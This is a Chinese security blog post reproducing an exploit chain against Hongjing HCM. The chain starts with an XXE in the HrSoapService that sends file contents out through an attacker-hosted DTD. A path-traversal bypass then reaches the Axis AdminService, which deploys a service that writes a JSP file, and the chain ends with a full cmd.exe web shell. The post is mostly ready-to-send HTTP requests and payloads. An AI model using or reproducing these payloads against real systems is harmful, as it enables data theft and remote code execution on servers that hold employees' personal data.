宏景HCM-漏洞复现

admin 2022年5月12日12:45:47安全文章评论38 views5109字阅读17分1秒阅读模式

点击蓝字

关注我们


前言

宏景HCM的Xfire webservice存在xxe漏洞,xxe可以当作ssrf使用,可以探测本地开放端口,可以读文件列目录,结合%2e%2e权限绕过以及Axis 本地AdminService可以部署恶意服务造成远程代码执行漏洞。

其实这个漏洞利用在seebug上已有,https://www.seebug.org/vuldb/ssvid-99429

这里是因为遇到了该漏洞环境又为了方便自己利用就重新组织了一下语言。

本文首发于secin安全社区,原文地址:https://www.sec-in.com/article/1702

01

XXE漏洞利用

准备公网服务器,开启一个python的http服务:

python3 -m http.server

在http服务目录下新建一个dtd文件,utf-8格式:

XML<!ENTITY % all"<!ENTITY &#x25; send SYSTEM 'aaa://%file;'>">%all;

这样就可以在漏洞环境中,直接测试一下存在的目录了:

poc:x.x.x.x填写vps地址

HTTPPOST /services/HrSoapService HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 600Host: targethostConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///home/apache-tomcat-9.0.37/webapps/"> <!ENTITY % dtd SYSTEM "http://x.x.x.x:8000/my.dtd"> %dtd; %send; ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrs="http://www.hjsoft.com.cn/HrSoapService">

注意:file需要根据指定环境了。如果是windows:file:///c:/ ,不然就是提着猪头进庙——找错门了。

02

执行命令利用

创建一个axis的服务

我们先创建一个axis服务,poc如下

HTTPPOST /services/HrSoapService HTTP/1.1Accept-Encoding: gzip,deflateContent-Type: text/xml;charset=UTF-8SOAPAction: ""Content-Length: 1265Host: x.x.x.xConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY a SYSTEM "http://localhost:80/w_selfservice/oauthservlet/%2e%2e/%2e%2e/axisservices/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22random4%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2FROOT%2Fshell4.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrs="http://www.hjsoft.com.cn/HrSoapService"> <soapenv:Header/> <soapenv:Body> <hrs:syncProcess> <hrs:in0>aaa &a;</hrs:in0> <hrs:in1>aaa</hrs:in1> <hrs:in2>aaa</hrs:in2> </hrs:syncProcess> </soapenv:Body></soapenv:Envelope>

解释一下上面poc的中间那段看不懂的的东西:

http://localhost:80/w_selfservice/oauthservlet/../../axisservices/AdminService?method=!--><deploymentxmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"><service name=" random4" provider="java:RPC"><requestFlow><handler type="java:org.apache.axis.handlers.LogHandler" ><parameter name="LogHandler.fileName" value="../webapps/ROOT/shell4.jsp" /><parameter name="LogHandler.writeToConsole" value="false" /></handler></requestFlow><parameter name="className" value="java.util.Random" /><parameter name="allowedMethods" value="*" /></service></deployment

中间这段url解码过来,是要生成一个jsp的文件,方便我们进行下一步操作。

写一个cmd马

HTTPPOST /axisservices/random4 HTTP/1.1Host: x.x.x.x:80Content-Type: text/xml; charset=utf-8Accept: application/soap+xml, application/dime, multipart/related, text/*User-Agent: Axis/1.4Cache-Control: no-cachePragma: no-cacheSOAPAction: ""Content-Length: 964
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java"> <soapenv:Header/> <soapenv:Body> <util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>]]></in0> <in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1> </util:ints> </soapenv:Body></soapenv:Envelope>

shell命令为http://x.x.x.x/shell4.jsp?c=whoami。


03

DIY代码

主要还是中间那段:

<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr= dis.readLine(); }; p.destroy(); }%>

可以写任意jsp内容,想写啥写啥。


结语

感谢收看。。。

线

宏景HCM-漏洞复现



原文始发于微信公众号(云见安全):宏景HCM-漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月12日12:45:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  宏景HCM-漏洞复现 http://cn-sec.com/archives/1001030.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: